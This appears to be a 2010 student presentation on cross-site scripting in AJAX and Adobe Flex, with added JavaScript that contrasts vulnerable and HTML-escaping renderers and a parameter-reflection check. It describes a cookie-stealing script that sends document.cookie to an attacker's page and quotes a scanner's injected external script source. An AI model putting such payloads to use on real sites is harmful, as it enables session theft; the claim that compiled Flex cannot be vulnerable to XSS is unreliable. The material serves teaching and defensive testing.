Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.

What is Cross-Site Scripting? Cross-Site Scripting, or XSS (not to be confused with CSS, Cascading Style Sheets), allows attackers to inject client-side script into a web page. The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash, into an application to try to get access to sensitive information. Dynamic websites (using AJAX or Flex, for example) are vulnerable. Static websites are not at risk.

Diagram of XSS Attack (figure; from CGISecurity.com)

XSS Compared to Other Vulnerabilities XSS is the #1 website security issue, with a 66% likelihood that a website has the vulnerability. Statistics from the WhiteHat Website Security Report, Fall 2009 edition.

XSS Types Two types of XSS attacks:
Nonaltering (or Non-Persistent): causes no change to the page functionality.
Altering (or Persistent): a script injection that can be placed permanently in the database, which causes a change to the page functionality that will persist each time the page is requested.

Non-Altering (Non-Persistent) The attacker can take a URL that contains personal data and modify the username field by entering JavaScript to steal the cookie, altering the URL so that the parameter carries a script tag around document.location='[attacker URL omitted in the transcript]kiesteal.cgi?'+document.cookie. To diminish suspicion the attacker can URL-encode the JavaScript so it is not apparent.

Altering (Persistent) Within a forum, users' posts may be stored in a database, usually being tracked by a session id cookie. An attacker can post a message containing malicious script that, if a user reads it, may compromise their account.
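The two cases on the preceding slides, the reflected username parameter and the stored forum post, shown side by side as a vulnerable renderer and a hardened one. This is an added example, not code from the slides or from any application they mention; the page markup, usernames, posts and the in-memory "database" are all constructed, and the probe string is a harmless marker rather than a real payload. It runs under Node.js with no dependencies.

```javascript
// Added example (not from the original slides): reflected ("non-persistent")
// and stored ("persistent") XSS, each as a vulnerable renderer next to a
// hardened one. All data below is constructed for the demonstration.

// Encode the five characters that let text break out of HTML text or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reflected case: the username comes straight from the query string.
// Vulnerable: raw concatenation, so a "<script>" in the parameter becomes live markup.
function renderGreetingUnsafe(username) {
  return '<p>Welcome, ' + username + '</p>';
}

// Hardened: identical output shape, but the parameter is encoded for HTML text context.
function renderGreetingSafe(username) {
  return '<p>Welcome, ' + escapeHtml(username) + '</p>';
}

// Stored case: forum posts persisted in a constructed in-memory "database".
const postDb = [];
function storePost(author, body) {
  postDb.push({ author, body });
}

// Vulnerable: every later reader of the thread receives the stored script.
function renderPostsUnsafe() {
  return postDb
    .map(p => `<div class="post"><b>${p.author}</b>: ${p.body}</div>`)
    .join('\n');
}

// Hardened: escape at output time, regardless of what was stored.
function renderPostsSafe() {
  return postDb
    .map(p => `<div class="post"><b>${escapeHtml(p.author)}</b>: ${escapeHtml(p.body)}</div>`)
    .join('\n');
}

// Does the rendered HTML contain a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed probe input: a harmless marker, not a real payload.
const PROBE = '<script>probe()</script>';

// Runs both cases and reports whether the probe survived as live markup.
function demo() {
  storePost('alice', 'hello');
  storePost('mallory', PROBE);
  return {
    reflectedUnsafe: containsScriptTag(renderGreetingUnsafe(PROBE)), // true
    reflectedSafe: containsScriptTag(renderGreetingSafe(PROBE)),     // false
    storedUnsafe: containsScriptTag(renderPostsUnsafe()),            // true
    storedSafe: containsScriptTag(renderPostsSafe()),                // false
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The hardened versions do not try to detect or strip "bad" input; they encode every untrusted value at the point where it is written into HTML, which is what protects both the reflected and the stored case no matter what was typed or what is already in the database.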

Threat to AJAX Because of the JavaScript and client-side scripting of AJAX, its largest security risk is XSS. From AJAX: The Definitive Guide: "Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening. Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser."

Threat to Adobe Flex Though not as common as with AJAX, Flex has also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application. However, Adobe, realizing the threat, has strict security in place to prevent XSS. By default, you cannot call script on an HTML page if the HTML page is not in the same domain as the Flex application. Since a Flex application is compiled into a .swf, it cannot itself be vulnerable to XSS. The sandbox security model prevents private information from being sent elsewhere.

Testing for XSS Vulnerabilities Acunetix Web Vulnerability Scanner: a tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications). HP SWFScan: a tool that is helpful in finding security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, and then analyzes it for vulnerabilities.

Testing AJAX Application Using Acunetix, Kayak.com (the AJAX web application for travel comparison) was found to have 146 vulnerabilities. Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET in a variable named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to "+src=" /xss.js?40392">
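The check a scanner performs on a GET parameter like the tab variable above can be reproduced as a regression test for one's own endpoints. The block below is an added example, not the slides' code and not Acunetix: it sends a uniquely tagged probe to a constructed toy handler (one that echoes the value raw, one that HTML-encodes it) and reports whether the parameter is reflected and whether the quote and angle-bracket characters reached the page unencoded. Node.js, no dependencies; the handlers and markup are assumptions made for the example.

```javascript
// Added example (not from the slides or from any scanner): a reflection check
// for a query parameter, run against constructed handlers so it works offline.

// Compact HTML encoder for the hardened handler.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Constructed toy handler: renders the selected navigation tab from the query string.
// Vulnerable: the raw value lands in both an attribute and the element text.
function tabPageUnsafe(query) {
  const tab = query.get('tab') || 'Flights';
  return `<html><body><div id="tab" data-name="${tab}">${tab}</div></body></html>`;
}

// Hardened: the same page, with the value encoded before it is written into HTML.
function tabPageSafe(query) {
  const tab = escapeHtml(query.get('tab') || 'Flights');
  return `<html><body><div id="tab" data-name="${tab}">${tab}</div></body></html>`;
}

// A probe is a random token wrapped in the characters that matter in HTML.
// The token locates the reflection; the wrapper shows whether the context
// boundary (attribute quote, tag bracket) survived unencoded.
function makeProbe() {
  const token = 'xsschk' + Math.random().toString(36).slice(2, 10);
  return { token, value: `"><${token}>` };
}

// Test one parameter against one handler (a function taking URLSearchParams
// and returning an HTML string). Returns { reflected, unescaped }.
function checkReflection(handler, paramName) {
  const probe = makeProbe();
  const query = new URLSearchParams({ [paramName]: probe.value });
  const html = handler(query);
  const reflected = html.includes(probe.token);
  // The whole probe surviving verbatim means '"' and '<' reached the page raw.
  const unescaped = html.includes(probe.value);
  return { reflected, unescaped };
}

// Convenience: run the check over every handler in a map and summarise.
function auditHandlers(handlers, paramName) {
  const report = {};
  for (const [name, handler] of Object.entries(handlers)) {
    report[name] = checkReflection(handler, paramName);
  }
  return report;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditHandlers({ unsafe: tabPageUnsafe, safe: tabPageSafe }, 'tab'));
}
```

A reflected-but-encoded result is expected for any parameter the page legitimately displays; the finding worth fixing is reflected and unescaped, which is the condition the scanner exploited against the tab variable on the slide.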

Testing AJAX

Flex Using HP SWFScan, the Flex application Sherwin Williams Color Visualizer (williams.com/visualizer) was tested. No XSS vulnerabilities were found.

Testing Flex

Conclusion XSS can be both damaging and costly while compromising user security. XSS is a bigger risk to AJAX, due to the JavaScript and client-side scripting. Flex is vulnerable but a lot more resistant due to Adobe's security features. Developers of both AJAX and Flex applications should check and validate any input to ensure it doesn't include script.

References
Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from
Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved from
Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide. Retrieved from
Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved from
Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved from
Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA: O'Reilly Media.
WhiteHat Security (2009). WhiteHat Website Security Statistics Report. Retrieved from